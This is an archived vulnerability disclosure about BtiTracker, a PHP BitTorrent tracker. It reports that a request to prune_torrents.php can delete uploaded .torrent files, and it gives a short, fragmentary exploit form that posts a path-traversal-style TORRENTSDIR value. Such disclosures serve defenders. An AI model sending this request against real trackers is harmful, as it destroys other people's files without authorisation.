AOH :: HP Unsorted B :: B06-5094.HTM

Btitracker vuln



Vulnerability in Btitracker
Vulnerability in Btitracker



Hello,
I found a vulnerability in btitracker (a tool for create a bittorrent tracker written in php=85).
This vulnerability can remove physically uploaded files .torrent
video : http://aeroxteam.free.fr/btitracker.html 
exploit(not to diffuse) :

action="http://127.0.0.1/btitracker/include/prune_torrents.php?action=prune&TORRENTSDIR=../torrents" method="POST">
Hash :

Gu1ll4um3r0m41n, Aerox Team

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.